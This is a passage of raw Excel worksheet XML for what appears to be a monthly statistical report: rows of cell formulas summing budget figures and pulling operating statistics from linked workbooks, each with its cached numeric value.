        <f>'[11]31'!$X$72</f>
        <v>62.9180855286523</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]31'!$Y$72</f>
        <v>61.4562464126039</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]31'!$T$72</f>
        <v>37.5</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]31'!$U$72</f>
        <v>64.3373655913979</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]31'!$V$72</f>
        <v>51.9083333333333</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]31'!$Q$72</f>
        <v>9.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]31'!$R$72</f>
        <v>478.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]31'!$S$72</f>
        <v>4547.17</v>
      </c>
    </row>
    <row r="16" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f t="shared" ref="E16:E19" si="4">E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f t="shared" ref="G16:G19" si="5">G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'30'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f t="shared" ref="J16:J19" si="6">J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'30'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]31'!$W$73</f>
        <v>63</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]31'!$X$73</f>
        <v>61.0198487128223</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]31'!$Y$73</f>
        <v>62.720234204444</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]31'!$T$73</f>
        <v>37.5</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]31'!$U$73</f>
        <v>65.2110215053763</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]31'!$V$73</f>
        <v>53.4404109589041</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]31'!$Q$73</f>
        <v>9.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]31'!$R$73</f>
        <v>485.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]31'!$S$73</f>
        <v>4681.38</v>
      </c>
    </row>
    <row r="17" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'30'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'30'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]31'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]31'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]31'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]31'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]31'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]31'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]31'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]31'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]31'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'30'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'30'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]31'!$W$74</f>
        <v>220</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]31'!$X$74</f>
        <v>217.982142857143</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]31'!$Y$74</f>
        <v>221.669906370098</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]31'!$T$74</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]31'!$U$74</f>
        <v>15.0537634408602</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]31'!$V$74</f>
        <v>7.69326484018265</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]31'!$Q$74</f>
        <v>10</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]31'!$R$74</f>
        <v>112</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]31'!$S$74</f>
        <v>673.93</v>
      </c>
    </row>
    <row r="19" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'30'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'30'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]31'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]31'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]31'!$Y$72</f>
        <v>9.16666666666667e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]31'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]31'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]31'!$V$72</f>
        <v>4.24657534246575e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]31'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]31'!$R$72</f>
        <v>3.1e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]31'!$S$72</f>
        <v>0.000372</v>
      </c>
    </row>
    <row r="20" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f t="shared" ref="E20:J20" si="7">E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'30'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'30'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]31'!$W$73</f>
        <v>231.197073700122</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]31'!$X$73</f>
        <v>211.912182720452</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]31'!$Y$73</f>
        <v>238.0265535972</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]31'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]31'!$U$73</f>
        <v>37.8911331989247</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]31'!$V$73</f>
        <v>69.2196389497717</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]31'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]31'!$R$73</f>
        <v>281.910031</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]31'!$S$73</f>
        <v>6063.640372</v>
      </c>
    </row>
    <row r="21" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]31'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]31'!$E$22</f>
        <v>4132</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'30'!H21</f>
        <v>215822</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2325260</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]31'!$I$22</f>
        <v>7369.98</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'30'!K21</f>
        <v>248980.17</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2315434.17</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]31'!$L$22</f>
        <v>49895.14</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>106.159872340426</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]31'!$W$81</f>
        <v>282.829268292683</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]31'!$X$81</f>
        <v>277.499306567365</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]31'!$Y$81</f>
        <v>275.831243056423</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]31'!$T$81</f>
        <v>42.7083333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]31'!$U$81</f>
        <v>35.131832437276</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]31'!$V$81</f>
        <v>36.0404585235921</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]31'!$Q$81</f>
        <v>10.25</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]31'!$R$81</f>
        <v>261.380833333333</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]31'!$S$81</f>
        <v>3157.14416666667</v>
      </c>
    </row>
    <row r="22" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]31'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]31'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'30'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]31'!$I$17</f>
        <v>4964.85</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'30'!K22</f>
        <v>207088.91</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2098550.29</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]31'!$L$17</f>
        <v>45537.442</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>22.768721</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]31'!$W$79</f>
        <v>108.820512820513</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]31'!$X$79</f>
        <v>102.653156946799</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]31'!$Y$79</f>
        <v>102.296684017156</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]31'!$T$79</f>
        <v>40.625</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]31'!$U$79</f>
        <v>50.227859916368</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]31'!$V$79</f>
        <v>45.7905726788432</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]31'!$Q$79</f>
        <v>9.75</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]31'!$R$79</f>
        <v>373.695277777778</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]31'!$S$79</f>
        <v>4011.25416666667</v>
      </c>
    </row>
    <row r="23" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]31'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]31'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'30'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]31'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'30'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]31'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]31'!$W$80</f>
        <v>77.1568714432376</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]31'!$X$80</f>
        <v>83.4948223620684</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]31'!$Y$80</f>
        <v>79.579074545719</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]31'!$T$80</f>
        <v>91.318287037037</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]31'!$U$80</f>
        <v>40.366935483871</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]31'!$V$80</f>
        <v>33.1642218417047</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]31'!$Q$80</f>
        <v>21.9163888888889</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]31'!$R$80</f>
        <v>300.33</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]31'!$S$80</f>
        <v>2905.18583333333</v>
      </c>
    </row>
    <row r="24" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]31'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]31'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'30'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]31'!$I$56</f>
        <v>1780.85</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'30'!K24</f>
        <v>47084.13</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>326910.66</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]31'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]31'!$R$6</f>
        <v>90.5365853658537</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]31'!$S$6</f>
        <v>83.8943992523841</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]31'!$T$6</f>
        <v>85.9321507047537</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]31'!$O$6</f>
        <v>42.7083333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]31'!$P$6</f>
        <v>63.2836021505376</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]31'!$Q$6</f>
        <v>53.2505707762557</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]31'!$L$6</f>
        <v>10.25</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]31'!$M$6</f>
        <v>470.83</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]31'!$N$6</f>
        <v>4664.75</v>
      </c>
    </row>
    <row r="25" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]31'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'30'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]31'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'30'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]31'!$R$7</f>
        <v>168.952380952381</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]31'!$S$7</f>
        <v>187.879339783722</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]31'!$T$7</f>
        <v>187.601723956314</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]31'!$O$7</f>
        <v>65.625</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]31'!$P$7</f>
        <v>59.0389784946236</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]31'!$Q$7</f>
        <v>50.9341324200913</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]31'!$L$7</f>
        <v>15.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]31'!$M$7</f>
        <v>439.25</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]31'!$N$7</f>
        <v>4461.83</v>
      </c>
    </row>
    <row r="26" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'30'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'30'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]31'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]31'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]31'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]31'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]31'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]31'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]31'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]31'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]31'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'30'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'30'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]31'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]31'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]31'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]31'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]31'!$U$69</f>
        <v>51.2970430107527</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]31'!$V$69</f>
        <v>66.9238584474886</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]31'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]31'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]31'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'30'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'30'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]31'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]31'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]31'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]31'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]31'!$U$104</f>
        <v>31.0439516129032</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]31'!$V$104</f>
        <v>61.5412899543379</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]31'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]31'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]31'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'30'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'30'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]31'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]31'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]31'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]31'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]31'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]31'!$V$105</f>
        <v>32.0112100456621</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]31'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]31'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]31'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'30'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'30'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]31'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]31'!$X$72</f>
        <v>0</v>
